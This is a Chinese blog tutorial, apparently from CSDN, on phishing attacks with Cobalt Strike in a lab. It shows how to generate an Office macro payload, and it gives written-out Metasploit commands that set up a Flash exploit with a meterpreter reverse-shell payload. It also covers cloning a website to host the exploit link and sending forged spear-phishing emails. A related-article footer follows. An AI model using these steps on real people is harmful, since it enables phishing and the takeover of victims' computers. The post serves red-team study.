java 邮件模板_Cobalt strike 邮件钓鱼攻击

最新推荐文章于 2024-05-21 22:48:46 发布
最新推荐文章于 2024-05-21 22:48:46 发布
阅读量691 收藏 1
点赞数
文章标签: java 邮件模板 java邮件模板 邮件服务器的搭建

​网上有关于office宏病毒的钓鱼文章,生成的宏病毒很容易被杀软隔离,我们先简单介绍下这种方式的运用,如下是利用office宏进行钓鱼的流程:

首先,在cobalt strike中需要创建一个监听器:

6487185c8da92032af0c4cb4695dfa59.png

在Listeners中,选择add创建监听

fb4794564f6511c5e3f38235598985c4.png

我们在创建监听的时候会发现有多种 payload 供选择。其中 foreign 指外部监听,beacon指cobalt strike内部监听,其他的类型根据http和https以及smb等自行可以选择,看你主要用到哪种。

8c355b94edeb217e6aea8cc285673b0f.png

这里,我们创建如下监听:host和port指cobalt strike的服务器地址和监听端口,这里因为我只部署了一台cobalt strike团队服务器,固选择部署的这台即可,端口可以给非占用的任意端口。

c9ba13e8e5d09450128abf4137176dad.png

下面我们来生成一个宏病毒,如图所示:

b762a64bbf7648f23a1ee4ee02af4a8d.png

在cobalt strike中生成利用程序木马等在attackes->Packages选项中。以下是每个选项的作用:

 HTML Application:生成恶意的HTA木马文件​ MS Office Macro:生成office宏病毒文件​ Payload Generator:生成各种语言版本的payload​ USB/CD AutoPlay:生成利用自动播放运行的木马文件​ Windows Dropper:捆绑器,能够对文档类进行捆绑​ Windows Executable:生成可执行exe木马​ Windows Executable(S):生成无状态的可执行exe木马       

选择MS Office Macro选项,生成宏病毒。Listener选择我们第一步创建的监听链接

90e35aa5addd9a33471466df442f196e.png

点击Generate后,界面如下:选择Copy Macro,至此,在我们的剪贴板中复制了一串宏代码

b1a300d01dd38467280ae920726a7c6f.png

启用office,在office中视图模块选择宏,如图所示:

f0964fc1b3b3bbd0d295c715df54457c.png

创建一个宏,如图所示:

721903bd38c328cff4e1ff827242fb59.png

将生成的宏代码,复制到office宏中,如图所示:

dceea30d0934786bbc7c900c4279dd39.png

保存该文件,保存的类型选择启用的宏Word文档。(office宏默认是关闭的)

c5c072eccf4220f33aeabd78ae5ced5f.png
83b1d8aa938ad6ced3d0be64f10224e6.png

发现生成的该文件很容易被杀软监测出来,并处理掉,加上它的局限性,在外网实际中意义不大,在内网用用效果可能还好。这里给大家推荐一篇TideSec安全团队写的一篇文章,里面有说到利用宏创建持久性后门,这里就不赘述了。链接地址:https://mp.weixin.qq.com/s/lhg71lVHfp9PY1m8sYXA_A

那么下面给大家介绍一种可能实际用到的方式:

实验准备阶段:

电脑虚拟机搭建的邮件服务器地址:10.10.10.133

Cobalt strike团队服务器地址:10.10.10.128

Kali虚拟机地址:10.10.10.128

这里我们应用到一个flash插件漏洞的payloads:adobe_flash_hacking_team_uaf

通过cobalt strike结合metasploit进行实验,如下:

通过kali启用metasploit。配置如下信息:

fbc4babedafa5acf73ec19ddec94ce43.png 
use exploit/multi/browser/adobe_flash_hacking_team_uaf set payload windows/meterpreter/reverse_httpset lhost 10.10.10.128set lport 80set disablepayloadhandler trueset prependmigrate trueexploit –j

执行后如图所示,会得到一个利用地址,记录该地址:

http://10.10.10.128:8080/Iw9ycnRjSC

4cf0b6786a7285ac3608c885c7e37ee8.png

接下来为了方便钓鱼邮件的内容伪造的真实,我们通过cobalt strike克隆一个网站。

如图所示,进入Web-Drive-by选项选择Clone Site。这里说明一下每个选项的含义:

Manage:对开启的web服务进行管理​ Clone Site:克隆网站,可以记录受害者提交的数据​ Host File:提供一个文件下载,可以修改Mime信息​ Signed Applet Attack:使用java自签名的程序进行钓鱼攻击​ Smart Applet Attack:自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本​ System Profiler:用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等

1e90c726961e79e107c9926bc5759134.png

配置信息如下:

其中attack就是我们metasploit中生成的地址链接

31a94c1ec953d1a2bf1a7a9252dd914a.png
d647880112df8c9ce0c870d220284305.png

如图是我们克隆出来的百度链接:

4fb417ae06b34e7b83e02ede3c0829b0.png

这里返回了利用flash插件漏洞生成的一个克隆链接。现在我们进行邮件伪造。

1、kali下创建目标清单:leafpad targets.txt

0e223908e97e054c9ffbdb2789c1f071.png

注意中间的红线用TAB键进行分割,这里的test是姓名。可以是多个邮件地址,每一行一个邮件地址,用TAB键分割。后半部分是姓名。

2、创建一个钓鱼模板:使用自己的网络邮箱,show original显示源代码,这就是我们的“钓鱼”模板。将内容复制到剪贴板,cat >rsa.template,右键paste粘贴。

QQ的邮箱在显示邮件原文可以看到源代码。Foxmail可以在更多选项中的查看源码找到。如图所示:

7396d1394fc67915d0d459855d762cd9.png
c7a4e390bdf2728a96ecc891854e8dd2.png

在cobalt strike中选择attack->spear Phish

b1652b7d38e6b1e6bfcee927f25d8bef.png

点击send进行发送

04181fc151ddb4f938ceff8b43c7cc8a.png

邮件发送成功,如果客户端存在flash漏洞,等待点击邮件模板里的链接即可跳转到我们的http://10.10.10.128/search地址,并通过flash漏洞,获取到该终端的权限,该终端会成功上线。

注意:因为邮件服务器和CS团队服务器都是我在本地虚拟机搭建的,不在公网上的。所以暂时未模拟到真实邮件。

本文只用于学习研究,请勿用作其他非法用途

weixin_39677027
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
gophish配合邮件服务器,【CSCobalt Strike发送钓鱼邮件
weixin_32384503的博客
07-30 1662
0x00 简介关于Spear phish 和发件人伪造的工具有很多个,比如gophish、SimpleEmailSpoofer、命令行工具swaks等,每个工具都有其特点,当然Cobalt Strike也有此功能。官方介绍戳我。今天主要来介绍一下CS里面的此功能怎么使用。0x01 CS Spear PhishCS的Spear Phish位置在:一张图说明功能:使用此功能的前提是需要有一个smtp服...
Java环境变量配置cobalt strick4.4启动
weixin_43167326的博客
04-26 1203
2.首先安装好java17配置环境变量 2.Path这里添加%JAVA_HOME% 3.输入这两条命令配置出现参数表示成功 4.在CS4.4当前目录启动Cmd,后门两个参数是主机ip和密码 启动成功
Cobalt Strike4.0安装以及java/jdk环境安装百分百成功
告白的博客
08-05 4044
0x00 Cobalt Strike介绍 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动,行业内称之为后渗透神器,客户端不与服务端做交互,服务端可以与客户端做交互 作用: 自定义驱动,收集社会工程学资料进行摩斯密码类型(电话攻击攻击 收集网络环境获得基本资料 进行跨平台攻击 降低后渗透攻击难度,进行内网横向扩展 端口转发、扫描多模式端口Lis
kali系统实现钓鱼邮件实验
最新发布
qq_39706166的博客
05-21 951
使用Kali完成钓鱼邮件攻击测试
Cobalt Strike使用教程
烟雨天青色
08-19 2562
0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可...
cobalt strik启动
y995zq的博客
03-15 1万+
知识共享
神器CobaltStrike4.8安装指南
Sgirll的博客
07-22 4684
Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。
Cobalt Strike 4.0 dist_Strike!_Cobalt_cobaltstrike_
10-02
cobalt strike distribution package 4.0
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
cobalt strike 4.7
06-07
cobalt strike 4.7
CobaltStrike4.4.zip
09-15
CobaltStrike4.4
HW_Cobalt_Strike应该这样学1
08-03
前言良好的习惯是人生产生复利的有力助手上一篇文章中讲解了elf loader的实现,接下来会有文章继续拓展这个内容:打造无execve的shellcode版今天
CobaltStrike基础教程(一)
Azjj
08-10 1962
0x00 简介 1. 什么是CobaltStrike? CobatStrike是一款基于java编写的全平台多方协同后渗透攻击框架。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、远控木马等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节。在渗透人员实战过程中可以提供一些非常便捷的功能,也可以自己编写脚本实现自动化操作。 2. CobaltStrike的文件结构 │ Scripts 用户安装的插件 │ agscript 拓展应用的脚本 │
Java内存溢出
weixin_30597269的博客
10-17 104
中间件应用Java内存溢出常见的三种情况: 1.OutOfMemoryError: Java heap space 2.OutOfMemoryError: PermGen space 3.OutOfMemoryError: unable to create new native thread. 第一种:堆溢出 提示:在JVM中如果98%的时...
钓鱼邮件检测
WangYouJin321的博客
03-04 921
社工+伪装技术的"钓鱼"邮件检测特征 实体特征: 1.伪装成吸引人感兴趣的邮件,如升值加薪、岗位调动、假期安排 2.批量钓鱼(多接收方)、鱼叉(针对特定用户)、捕鲸(高危用户) 3.涉及敏感信息(银行卡 手机号 等) 4.大部分情况下来自于外网(也有先攻陷内部单个用户邮箱做为肉机的) 5.立马有下载按钮连接、点击回下载或进入不安全网站 6.url高风险(结合威胁情报、dga域名检测) 7.包含恐吓信息,影响用户情绪(欺诈、彩票等) 统计特征: 1.发件人历史邮箱使用行为异常(异常群发邮件、发送时间) 2.建
cobaltstrike安装加破解教程+使用教程
weixin_30580943的博客
06-17 2082
1.先安装java环境= = 1. 下载1.8u121的JAVA JDK (新的java JDK不稳定)!!原因:https://blog.cobaltstrike.com/2017/04/26/java-startup-bug-in-java-1-8u131/ (即使你安装了新的也没关系接下来你就知道了) http://www.oracle.com/technetwork/java/java...
Cobalt-Strike基本使用
热门推荐
m0_52233414的博客
01-31 1万+
Cobalt Strike(简称为CS)是一款基于java的渗透测试工具(尤其是后渗透阶段),自3.0开始已经不再使用Metasploit框架而作为一个独立的平台使用,这款工具有其他很多渗透测试工具没有的团队合作功能,团队成员可以连接到同一个服务器上进行合作,共享攻击资源。
cobaltstrike安装使用
w7deer的博客
05-06 5643
Cobalt Strike是一款基于java的渗透测试神器,被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马、win dll木马、java木马、office宏病毒等,钓鱼攻击包括:站点克隆,目标信息获取等
kali中下载冰蝎及出现的常见的问题,以及冰蝎的使用。
weixin_63021331的博客
03-30 1959
在之前下载冰蝎和哥斯拉时出现过许许多多问题,翻看许多网上资料也是愁哭我了,在后面慢慢的就摸索到了,本文将重点介绍在kail下载冰蝎出现的问题以及冰蝎的使用。因为kali本身为java11环境,所以需要去下载java8。java下载链接冰蝎下载到这里差不多冰蝎的基本功能已经全部介绍完了,现在已经更新迭代到4.0版本了,前面介绍的也是4.0,和3.0版本在于多了一些功能比如取消硬编码通信协议,传输协议完全自定义,加密流量特征以及传输方式也有较大差异。建议大家将哥斯拉和冰蝎联合使用,可以互相补充。
Cobalt strike DNS beacon攻击如何复现
04-29
下面是复现 Cobalt Strike DNS Beacon 攻击的步骤: 1. 准备 Cobalt Strike 客户端和服务器。你可以在官网上购买或试用 Cobalt Strike。 2. 配置 Cobalt Strike 服务器和客户端之间的通信,确保客户端能够连接上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值